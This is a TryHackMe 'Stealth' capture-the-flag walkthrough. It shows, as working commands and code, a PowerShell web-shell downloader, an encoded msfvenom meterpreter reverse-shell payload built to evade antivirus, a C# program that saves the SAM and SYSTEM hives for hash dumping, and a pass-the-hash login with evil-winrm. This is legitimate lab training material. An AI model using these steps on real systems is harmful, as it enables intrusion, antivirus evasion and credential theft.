๐Stealth - TryHackMe Walkthrough / Writeup
Shortest Path to Admin, AV Bypass using msfvenom and meterpreter and more.
Table of Contents
Recon
Using nmap scan, for initial recon. I will spare you the delay of looking for open ports :)
nmap -sCV -Pn -p 139,445,3389,5985,8443,8000,8080,47001,49668,49665,49667,49669,49664,49676,49666 -vvv -T4 10.10.255.147PORT STATE SERVICE REASON VERSION
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=HostEvasion
| Issuer: commonName=HostEvasion
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-28T19:06:15
| Not valid after: 2024-01-27T19:06:15
| MD5: 110c:1c21:e230:b7c7:41f5:4b6a:bf2b:9e6a
| SHA-1: 34ad:3702:1a0a:2054:88a9:ea0c:820b:da64:b1bd:fb56
| -----BEGIN CERTIFICATE-----
| MIIC2jCCAcKgAwIBAgIQMIOcafxeh79B5cu+rs/taDANBgkqhkiG9w0BAQsFADAW
| MRQwEgYDVQQDEwtIb3N0RXZhc2lvbjAeFw0yMzA3MjgxOTA2MTVaFw0yNDAxMjcx
| OTA2MTVaMBYxFDASBgNVBAMTC0hvc3RFdmFzaW9uMIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEA2tUyXSZT7x2YueFMia0tU6xweBIvbwEXw0MBCXtHEf9A
| LqZ6aiwNSsiLeW/kfBsqw6LArZNajuGggR2uj2HLGMn9Yx2RjnMSUaVWlJnB+j7s
| YsgeVOr3Y8rFv0EPD2M6tKEZ7Zh8HoaBifHR3qeNIx+n6YcYmSjb0mUQ5kQso7SS
| L7a9Beya4aynWgHXegaCVP0CcA750BRf1Ax+tjpojoTJOarC0C1QibbDs0s6NbUY
| Z1CakxCRQlENDRau+vqqhRMxlbEfayl1YICTfMe6j3hMnVeYiPjZECt2nSe92i2p
| rnzpdZ4Xbe8tdDzGETQGkBdOCOKPk6/nh80ifpcjBQIDAQABoyQwIjATBgNVHSUE
| DDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBABB4
| HKrRnIrik9ef1F3Ah6r4FsdpCmZ0vXLNixsqm8IY81fNcRTogc/WFytU9gylcxRk
| LhoUqXwtQhKqMFOKcEh3Kq2+VMUvgxTxvDywFS4S02AlhWtafq8NBm5nfxxubuit
| tRO3fvdQ7mKS2hWvapW9+guEt0zJZI3Ai/C4NIq5WpbLEGSJe6DHUwXaPyFiHNYy
| 5j91hKUWbDnIy4TqiIPjhBjYhrTvi46fbGbqMpHelUGABzJ5LFfGjORMOWA1bRPz
| wuaEP62Dimr42pzbLPIgGTmBwpIXlpKdcydbJnVORxY4AfpLV6ypt2EPYS2TpKbz
| 4Fw5A8aWrShuerOI7mc=
|_-----END CERTIFICATE-----
|_ssl-date: 2023-11-29T11:43:47+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: HOSTEVASION
| NetBIOS_Domain_Name: HOSTEVASION
| NetBIOS_Computer_Name: HOSTEVASION
| DNS_Domain_Name: HostEvasion
| DNS_Computer_Name: HostEvasion
| Product_Version: 10.0.17763
|_ System_Time: 2023-11-29T11:43:09+00:00
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open http syn-ack PHP cli server 5.5 or later
|_http-title: 404 Not Found
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8080/tcp open http syn-ack Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
8443/tcp open ssl/http syn-ack Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
| tls-alpn:
|_ http/1.1
|_http-title: PowerShell Script Analyser
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49676/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 16378/tcp): CLEAN (Timeout)
| Check 2 (port 39114/tcp): CLEAN (Timeout)
| Check 3 (port 33647/udp): CLEAN (Timeout)
| Check 4 (port 36849/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time:
| date: 2023-11-29T11:43:13
|_ start_date: N/A
Ok, now as you can see a lot of open ports, but we will only focus on the 8080 port as that is the only way for initial access, unless you found something else.
Visiting the http://target:8080 presents us with the following page.
Since this is a windows server, we will upload a powershell file that will execute and download a web shell for us in C:\xampp\htdocs
You may choose any web shell, that you may like, my personal favorite is p0wny Shell.
Create a powershell script that will download the shell to htdocs directory.
# Specify the URL to download the file from
$url = "http://YOUR_IP/shell.php"
# Specify the local path to save the downloaded file
$localPath = "C:\xampp\htdocs\shell.php"
# Download the file and save it locally
Invoke-WebRequest -Uri $url -OutFile $localPathBefore we deliver it, start the server
python -m http.server 80Now upload our getShell.ps1 file! and wait for it to fetch our shell.php
Once done you can check the web shell at http://targetip:8080/shell.php
Weaponization
As you can see we have a local account access, now we can create a reverse shell payload, an encoded payload to avoid AV detection. But why, we already have a web shell? because....
TRUST ME BRO, TRUST THE PROCESS
Use the following command to generate a msfvenom payload. If you are using your own choice of encoder make sure it is x64.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f exe -o rev.exe -e x64/zutto_dekiruNotice the encoder I am using with -e x64/zutto_dekiru
You may generate the commands from revshells.com, but make sure you are using encoders. This generates a rev.exe file for us. Before we deliver it to target, start the msfconsole listener.
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost YOUR_IP; set lport YOUR_PORT; exploit"Delivery
Once we are all done with the setup, use the web shell to deliver the payload and execute it to get the shell.
And you should receive the connection in no time.
You may check the uid first, check if its evader or not.
Then check what kind of privileges you have. Execute getprivs
Now if you notice carefully, we have a SeImpersonatePrivilege option which is enabled for us.
Exploitation ( Automatic )
I will divide the exploitation part, into 2 categories, one is automated with msfconsole and other one is manually exploiting the system.
Let's get started. The first is very simple, just execute : getsystem
And you should have admin access.
Disclaimer : Note that some users have reported, that this might be patched, it may or may not work for you but its worth at-least a try. ๐
Theory on why this one worked in the first place
I think since we are using an encoded agent, this avoids detection by AV, the payload might not be touching the disk at all but running in memory, to avoid getting flagged.
Exploitation ( Manual Method )
Once you have a web shell, enumerate the box to check if there is a .NET SDK compiler for us or not.
The next prerequisite is to check if you have SeImpersonatePrivilege enabled or not. use the following command.
whoami /priv
Ok now for the final showdown, we don't need a reverse shell, we will compile an exploit, locally on the system, and also another C sharp file that will execute the registry query to dump SAM/SYSTEM hive.
First lets download the exploit code on our machine.
Create another program like backup.cs, use the code below.
using System;
using System.Diagnostics;
class Program
{
static void Main()
{
ExecuteCommand("reg.exe", "save HKLM\\SYSTEM C:\\xampp\\htdocs\\system.bak");
ExecuteCommand("reg.exe", "save HKLM\\SAM C:\\xampp\\htdocs\\sam.bak");
Console.WriteLine("Backup completed successfully.");
}
static void ExecuteCommand(string command, string arguments)
{
Process process = new Process();
process.StartInfo.FileName = command;
process.StartInfo.Arguments = arguments;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.CreateNoWindow = true;
process.Start();
string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();
if (process.ExitCode != 0)
{
Console.WriteLine("Error: " + output);
}
}
}
Now upload both of the code on our target system using the web shell.
Now finally compile them using the following commands.
# For exploit.cs
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe exploit.cs -nowarn:1691,618
# For backup.cs
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe backup.csOnce done, execute them like following.
.\exploit.exe backup.exe
If you see backup successful, then all is well.
If you see the bak files being generated, lets get them.
wget http://TARGET_IP:8080/system.bak
wget http://TARGET_IP:8080/sam.bakDump the hashes
impacket-secretsdump -sam sam.bak -system system.bak local
Now use Evil-Winrm to access the box as admin, via pass the hash technique
evil-winrm -u Administrator -H ADMIN_HASH -i TARGET_IP
Get User Flag
The user flag is encoded in base64. Use the following command to decode.
# Download the flag on your own computer and use the following command
cat encodedflag | head -n -1|tail -n +2|base64 -d
Remove the following log file
And then reload the endpoint again, to get the flag!
Get Admin Flag
Theory on why the manual method works
Few years ago, I wrote a simple c program to print hello world, I thought to myself, how can I publish it and share it with others. So I compiled it on my windows machine, and executed it. It worked without any issues. But as soon as I ran it on a different computer or even a VM. Defender/UAC kicked in and flagged it as malicious as it did not have any valid digital certificate. Imagine a simple hello world getting flagged by the AV.
It was not the same with a java program, I wrote a simple hello world, created a jar file, and executed on different machine, it worked without any issues. Since it ran via Java, a trusted binary it did not have any issues.
So in this room, when we are compiling an actual exploit and defender does not find it suspicious, because it thinks the user is not mad to break the system. Same with the backup.cs file as well. But if you compile the program without signing it with a valid digital certificate it might get flagged on a different machine. Even if its running a Windows 10 Home Edition. Now if you think there might be a different reason, please feel free to share with me.
Credits to my friends for helping me research on this room
1st Person
Check out 0xb0b's writeup : https://0xb0b.gitbook.io/writeups/tryhackme/2023/stealth
2nd Person
Thank you for reading my article โค๏ธ Happy Hunting ๐, feel free to connect with me on Linkedin
Last updated
Was this helpful?